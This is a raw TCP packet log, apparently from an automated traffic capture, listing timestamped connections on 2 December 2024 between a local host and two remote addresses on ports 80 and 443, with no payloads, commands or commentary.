                                                            Dec 2, 2024 09:18:07.123095036 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.129400015 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.129457951 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.129496098 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.129523039 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.135557890 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.135576963 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.135610104 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.135636091 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.141388893 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.141459942 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.141473055 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.141508102 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.147272110 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.147329092 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.147376060 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.147413969 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.153134108 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.153228045 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.153253078 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.153275013 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.158937931 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.159007072 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.180107117 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.180187941 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.180249929 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.180293083 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.182995081 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.183052063 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.183105946 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.183139086 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.188880920 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.188951015 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.188982010 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.189023018 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.194470882 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.194529057 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.194578886 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.194634914 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.200372934 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.200442076 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.200458050 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.200490952 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.206228018 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.206302881 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.206412077 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.206459999 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.212121010 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.212182045 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.212223053 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.212272882 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.218018055 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.218082905 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.218177080 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.218220949 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.223839998 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.223901033 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.223948002 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.223989010 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.229696035 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.229756117 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.229805946 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.229845047 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.235611916 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.235672951 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.235738993 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.235774040 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.241483927 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.241534948 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.241611004 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.241650105 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.247361898 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.247423887 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.247463942 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.247493982 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.253232956 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.253304005 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.253339052 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.253374100 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.256915092 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.256969929 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.257025003 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.257071018 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.260608912 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.260672092 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.260699987 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.260739088 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.264312983 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.264377117 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.264404058 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.264445066 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.267952919 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.268045902 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.268074989 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.268120050 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.271631956 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.271689892 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.271769047 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.271811962 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.275326967 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.275388002 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.275422096 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.275461912 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.278604984 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.278661966 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.278750896 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.278793097 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.282033920 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.282095909 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.282133102 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.282181025 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.285182953 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.285244942 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.285279036 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.285317898 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.288398027 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.288451910 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.288484097 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.288523912 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.291529894 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.291588068 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.291615009 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.291656017 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.294687033 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.294743061 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.294820070 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.294866085 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:11.582866907 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:11.584664106 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:12.007431984 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:12.007474899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:12.007613897 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:12.017652988 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:12.017673016 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:13.559048891 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:13.618112087 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:13.618232012 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:13.627599955 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:13.627615929 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:13.627866983 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:13.648452044 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:13.695322037 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.008893967 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.008956909 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.009007931 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.009021997 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.009416103 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.030613899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.030625105 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.030680895 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.030694962 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.084173918 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.177500010 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.177512884 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.177651882 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.177660942 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.223033905 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.223066092 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.223092079 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.223099947 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.223112106 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.245098114 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.245105028 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.245131969 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.245291948 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.245300055 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.266118050 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.266125917 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.266149044 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.266176939 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.266186953 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.266196966 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.281765938 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.281774044 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.281800985 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.281831980 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.281841993 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.281863928 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.334209919 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.381529093 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.381541014 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.381573915 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.381607056 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.381656885 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.414329052 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.414335966 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.414362907 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.414405107 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.414446115 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.430941105 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.430948019 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.431009054 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.431016922 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.443363905 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.443372011 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.443420887 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.443428993 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.455991030 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.456000090 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.456058025 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.456067085 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.472513914 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.472521067 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.472598076 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.472605944 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.484980106 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.484987974 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.485045910 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.485059977 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.497580051 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.497591972 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.497638941 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.497647047 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.552920103 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.585963011 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.585973978 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.586031914 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.586040020 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.586086035 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.612462044 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.612471104 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.612503052 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.612536907 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.612564087 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.624171019 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.624180079 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.624267101 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.624274969 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.632694960 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.632703066 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.632769108 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.632776976 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.639391899 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.639400959 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.639451981 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.639461040 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.644536018 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.644546032 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.644599915 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.644608021 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.649781942 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.649825096 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.649852037 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.649861097 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.649873972 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.656466007 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.656500101 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.656538963 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.656546116 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.656579018 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.661567926 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.661636114 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.661643982 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.666784048 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.666846991 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.666855097 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.673505068 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.673566103 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.673574924 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.679519892 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.679573059 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.679579973 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.684611082 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.684700012 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.684706926 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.689846039 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.689898014 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.689904928 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.703083992 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.703151941 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.703160048 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.756046057 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.782697916 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.782706976 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.782733917 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.782758951 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.782778025 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.809920073 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.809927940 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.809971094 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.810005903 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.810012102 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.816701889 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.816737890 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.816757917 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.816766024 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.816788912 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.821902990 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.821916103 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.821959019 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.821966887 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.826936007 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.826986074 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.826997995 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.829577923 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.829629898 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.829638004 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.832319021 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.832369089 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.832376003 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.835642099 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.835697889 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.835705996 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.838279009 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.838335037 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.838342905 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.841025114 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.841078043 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.841085911 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.844399929 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.844451904 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.844464064 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.847600937 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.847681999 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.847690105 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.850059986 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.850122929 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.850131035 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.852761984 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.852819920 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.852828026 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.856152058 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.856200933 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.856208086 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.866108894 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.866163969 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.866175890 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.912316084 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.983120918 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.983129025 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:14.983187914 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:14.983195066 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.011426926 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.011437893 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.011497974 CET49733443192.168.2.4142.215.209.77
                                                            Dec 2, 2024 09:18:15.011507988 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.014142036 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.014149904 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.014178991 CET44349733142.215.209.77192.168.2.4
                                                            Dec 2, 2024 09:18:15.014205933 CET49733443192.168.2.4142.215.209.77
